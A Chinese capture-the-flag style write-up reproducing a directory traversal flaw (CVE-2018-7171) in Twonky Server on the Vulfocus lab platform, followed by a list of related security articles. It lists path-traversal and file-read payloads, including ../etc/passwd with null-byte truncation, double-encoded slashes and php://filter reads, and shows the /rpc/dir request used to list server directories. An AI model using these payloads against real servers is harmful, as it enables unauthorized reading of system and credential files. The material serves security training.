【漏洞复现-twonkyserver-目录遍历】vulfocus/twonkyserver-cve_2018_7171

简介: 【漏洞复现-twonkyserver-目录遍历】vulfocus/twonkyserver-cve_2018_7171

一、靶场环境


1.1、平台:


Vulfocus 漏洞威胁分析平台

123.58.224.8:44884

123.58.224.8:63774

123.58.224.8:29529

ea552233016c4c5aa5fc3d7bba63a5ab.png

123.58.224.8:29529

3df4ea5001ac4284afe452b7bbb4dfa6.png

1.2、知识:

1、文件读取(和目录遍历类似)


?url=file:/etc/pass


/fi/?page=C:/xxx


/index.php/?page=shell.php


index.php?path=php://filter/read=convert.base64-encode/resource=xxx.php(base64加密,避免被当成php执行而乱码)


2、跳目录


../上一级


(有时候可能需要考虑绕过过滤)


单次过滤:....//


正则匹配斜杠:..%252f(双重URL编码,因为浏览器会解码一次)


起始路径匹配:起始路径+相对路径结合绕过


后缀检测:空字节绕过(%00截断)../etc/passwd%00.png


1.3、描述:


LYNX Twonky Server 7.0.11版本至8.5版本中存在目录遍历漏洞。远程攻击者可通过向rpc/set_all发送带有‘..’序列的‘contentbase’参数利用该漏洞分享任意目录的内容


二、漏洞验证


2.1、分析:

http://ip:port/rpc/dir?path=/

c03f051946cc4929a2285aad2cd682e3.png


得到flag目录的信息

010D/tmp

http://ip:port/rpc/dir?path=01063f2d95b9843488487c70189d3d83d91.png


目录
相关文章
|
存储 安全 网络协议
【内网安全-横向移动】IPC$连接--->计划任务--->上线
【内网安全-横向移动】IPC$连接--->计划任务--->上线
761 0
【内网安全-横向移动】IPC$连接--->计划任务--->上线
|
监控 安全 JavaScript
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
1109 0
【web渗透思路】框架敏感信息泄露(特点、目录、配置)
|
供应链 安全 数据安全/隐私保护
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(上)
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(上)
1544 0
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(上)
|
存储 Web App开发 JavaScript
【BP靶场portswigger-客户端11】跨站点脚本XSS-20个实验(上)
【BP靶场portswigger-客户端11】跨站点脚本XSS-20个实验(上)
1962 0
【BP靶场portswigger-客户端11】跨站点脚本XSS-20个实验(上)
|
安全 网络协议 Linux
【内网安全-隧道搭建】内网穿透_Frp上线、测试
【内网安全-隧道搭建】内网穿透_Frp上线、测试
952 0
【内网安全-隧道搭建】内网穿透_Frp上线、测试
|
JavaScript
【web实战-业务逻辑】短信验证逻辑绕过
【web实战-业务逻辑】短信验证逻辑绕过
402 0
【web实战-业务逻辑】短信验证逻辑绕过
|
安全 Shell API
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
500 0
【BP靶场portswigger-服务端4】操作系统命令注入-5个实验(全)(上)
|
安全 算法 Oracle
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(下)
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(下)
863 0
【BP靶场portswigger-服务端5】业务逻辑漏洞-11个实验(全)(下)
|
安全 Java Shell
BP靶场portswigger-服务端8】文件上传漏洞-7个实验(全)(上)
BP靶场portswigger-服务端8】文件上传漏洞-7个实验(全)(上)
1032 0
BP靶场portswigger-服务端8】文件上传漏洞-7个实验(全)(上)
|
安全 Shell 网络安全
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
1113 0
【内网安全-横向移动】WMI-WMIC命令&相关内网工具